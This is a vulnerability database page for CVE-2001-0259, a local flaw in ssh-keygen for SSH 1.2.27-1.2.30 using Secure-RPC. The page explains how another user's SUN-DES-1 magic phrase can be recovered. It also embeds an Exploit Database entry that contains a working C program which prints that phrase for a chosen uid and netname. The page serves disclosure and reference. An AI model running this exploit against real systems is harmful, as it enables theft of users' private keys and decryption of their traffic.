CVE-2001-0259 : Detail

CVE-2001-0259

0.05%V3
Local
2001-05-07
02h00 +00:00
2005-11-02
09h00 +00:00
Notifications for a CVE
Stay informed of any changes for a specific CVE.
Notifications manage

CVE Descriptions

ssh-keygen in ssh 1.2.27 - 1.2.30 with Secure-RPC can allow local attackers to recover a SUN-DES-1 magic phrase generated by another user, which the attacker can use to decrypt that user's private key file.

CVE Informations

Metrics

Metrics Score Severity CVSS Vector Source
V2 3.6 AV:L/AC:L/Au:N/C:P/I:P/A:N [email protected]

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

Exploit information

Exploit Database EDB-ID : 20560

Publication date : 2001-01-15 23h00 +00:00
Author : Richard Silverman
EDB Verified : Yes

// source: https://www.securityfocus.com/bid/2222/info SSH is a package designed to encrypt traffic between two end points using the IETF specified SSH protocol. The SSH1 package is distributed and maintained by SSH Communications Security. A problem exists which could allow the discovery of the secret key used to encrypt traffic on the local host. When using SUN-DES-1 to share keys with other hosts on the network to facilitate secure communication via protocols such as NFS and NIS+, the keys are shared between hosts using the private key of the user and a cryptographic algorithm to secure the contents of the key, which is stored on the NIS+ primary. The problem occurs when the key is encrypted with the SUN-DES-1 magic phrase prior to having done a keylogin (the keyserv does not have the users DH private key). A design flaw in the software that shares the key with the NIS+ master will inconsistently return the correct value for an attempted keyshare that has failed. A step in the private key encryption process is skipped, and the users private key is then encrypted only with the public key of the target server and the SUN-DES-1 magic phrase, a phrase that is guessable due to the way it is generated. A user from the same host can then execute a function that returns another users magic phrase, and use this to decrypt the private key of the victim. This makes it possible for a user with malicious intent to gain knowledge of a users secret key, and decrypt sensitive traffic between two hosts, with the possibility of gaining access and elevated privileges on the hosts and/or NIS+ domain. This reportedly affects the SSH2 series of the software package. #include <stdio.h> #include <rpc/rpc.h> void die (char *msg) { fprintf(stderr,"%s\n",msg); exit(1); } main (int argc, char **argv) { char buf[MAXNETNAMELEN + 1]; des_block block; uid_t uid; char *netname; if (argc < 3) die("supply uid and netname"); sscanf(argv[1], "%d", &uid); netname = argv[2]; memset(buf, 0, sizeof(buf)); snprintf(buf, sizeof(buf), "ssh.%04X", uid); memcpy(block.c, buf, sizeof(block.c)); if (key_encryptsession(netname, &block) != 0) die("key_encryptsession failed"); printf("SUN-DES-1 magic phrase (uid %d, netname %s):\n %08X%08X\n", uid, netname, ntohl(block.key.high), ntohl(block.key.low)); }

Products Mentioned

Configuraton 0

Ssh>>Ssh >> Version 1.2.27

Ssh>>Ssh >> Version 1.2.28

Ssh>>Ssh >> Version 1.2.29

Ssh>>Ssh >> Version 1.2.30

References

http://www.securityfocus.com/bid/2222
Tags : vdb-entry, x_refsource_BID